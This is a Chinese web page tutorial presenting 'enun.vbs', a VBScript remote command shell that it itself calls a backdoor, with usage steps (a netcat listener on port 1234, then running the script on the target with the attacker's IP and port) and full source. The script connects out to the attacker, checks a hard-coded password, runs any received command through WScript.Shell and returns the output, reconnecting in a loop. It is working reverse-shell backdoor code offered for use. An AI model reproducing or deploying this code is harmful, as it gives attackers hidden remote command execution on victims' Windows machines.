VBScript 打造自己的遠(yuǎn)程CMDShell附使用教程
請(qǐng)先下載 mswinsck.ocx 與 VB6Controls.reg!
使用方法:
1,控制:nc.exe,執(zhí)行:nc -l -v -p 1234;
2,目標(biāo):cscript.exe enun.vbs IP Port;
3,密碼:enun。
幾點(diǎn)說明:
1,退出 SHELL,請(qǐng)輸入 “exit”,不要用 “Ctrl + C”,這樣的話只能等目標(biāo)重啟或手動(dòng)運(yùn)行后門才能連接;
2,Windows 7 等環(huán)境下普通標(biāo)準(zhǔn)用戶也能使用,但是獲取的權(quán)限相對(duì)有限。
3,內(nèi)部命令及管道使用如下圖:
相關(guān)下載:
1,視頻演示
2,vb6controls
enun.vbs 源碼:
'--------------------------------------------------------------------------
' Copyright (c) lxzzr. All rights reserved.
' ScriptName: enun.vbs
' Creation Date: 28/8/2012
' Last Modified: 28/8/2012
' Author: lxzzr, www.enun.net
' E-mail: lxzzr@21cn.com
' Usage: Cscript.exe //nologo enun.vbs IP Port
'--------------------------------------------------------------------------
On Error Resume Next
Public SocketObj, ExecObj, ShellObj
RemoteHost = Wscript.Arguments(0)
RemotePort = Wscript.Arguments(1)
Do
Do While (SocketObj.State <> 7)
WScript.Echo "Try Connect to " & RemoteHost & ":" & RemotePort & " ..."
Set SocketObj = WScript.CreateObject("MSWinsock.Winsock")
SocketObj.Protocol = 0
SocketObj.RemoteHost = RemoteHost
SocketObj.RemotePort = RemotePort
SocketObj.Connect
WScript.Sleep 3000
Loop
WScript.Echo "Connected to server."
SocketObj.SendData SocketObj.LocalHostName & " is Connected, Enter Password: "
Do While (SocketObj.BytesReceived = 0)
WScript.Sleep 10
Loop
'密碼驗(yàn)證
SocketObj.GetData Authkey, vbString
If Split(Authkey, chr(10), -1, 1)(0) = "enun" Then
Set ShellObj = CreateObject("WScript.Shell")
sRevData = " "
SocketObj.SendData "Logon Success, Welcome!" & chr(13) & chr(10)
'循環(huán)等待執(zhí)行命令
Do
Set ExecObj = ShellObj.Exec(Split(sRevData, chr(10), -1, 1)(0))
SocketObj.SendData ExecObj.StdOut.ReadAll
SocketObj.SendData ExecObj.StdErr.ReadAll
If sRevData <> "" Then
SocketObj.SendData chr(10) & "[" & SocketObj.LocalHostName & "@" & "enun]#: "
End If
If Left(sRevData, 4) = "exit" Then
SocketObj.Close
Exit Do
End If
SocketObj.GetData sRevData, vbString
WScript.Sleep 1000
Loop
Else
LockoutBadCount = LockoutBadCount + 1
SocketObj.SendData "Logon Failure: Unknown user name or bad password." & chr(13) & chr(10)
WScript.Sleep 1000
End If
'賬戶策略
If (LockoutBadCount > 3) Then
SocketObj.SendData "The User Account is locked!" & chr(13) & chr(10)
WScript.Sleep 1000
SocketObj.Close
LockoutBadCount = 0
WScript.Sleep 600*1000
End If
Loop
欄 目:vb
下一篇:Win7下VHD文件右鍵增強(qiáng)實(shí)現(xiàn)代碼(vbs+注冊(cè)表)
本文標(biāo)題:VBScript 打造自己的遠(yuǎn)程CMDShell附使用教程
本文地址:http://mengdiqiu.com.cn/a1/vb/7330.html
您可能感興趣的文章
- 01-10VBScript教程 第十一課深入VBScript
- 01-10用VBSCRIPT控制ONSUBMIT事件
- 01-10VBScript語法速查及實(shí)例說明
- 01-10VBScript教程 第七課使用條件語句
- 01-10vbscript 可以按引用傳遞參數(shù)嗎?
- 01-10VBScript教程 第二課在HTML頁面中添加VBscript代碼
- 01-10VBScript教程 第十四課在VBScript中使用對(duì)象
- 01-10VBScript教程 第六課VBScript運(yùn)算符
- 01-10VBScript的入門學(xué)習(xí)資料
- 01-10VBScript教程 第十二課VBScript頁面的簡單樣例


閱讀排行
本欄相關(guān)
- 01-10下載文件到本地運(yùn)行的vbs
- 01-10飄葉千夫指源代碼,又稱qq刷屏器
- 01-10SendKeys參考文檔
- 01-10什么是一個(gè)高效的軟件
- 01-10VBS中的正則表達(dá)式的用法大全 &l
- 01-10exe2swf 工具(Adodb.Stream版)
- 01-10VBS中SendKeys的基本應(yīng)用
- 01-10用VBSCRIPT控制ONSUBMIT事件
- 01-10VBScript教程 第十一課深入VBScript
- 01-10VBScript語法速查及實(shí)例說明
隨機(jī)閱讀
- 08-05織夢(mèng)dedecms什么時(shí)候用欄目交叉功能?
- 01-11Mac OSX 打開原生自帶讀寫NTFS功能(圖文
- 01-11ajax實(shí)現(xiàn)頁面的局部加載
- 01-10SublimeText編譯C開發(fā)環(huán)境設(shè)置
- 04-02jquery與jsp,用jquery
- 01-10C#中split用法實(shí)例總結(jié)
- 01-10delphi制作wav文件的方法
- 01-10使用C語言求解撲克牌的順子及n個(gè)骰子
- 08-05DEDE織夢(mèng)data目錄下的sessions文件夾有什
- 08-05dedecms(織夢(mèng))副欄目數(shù)量限制代碼修改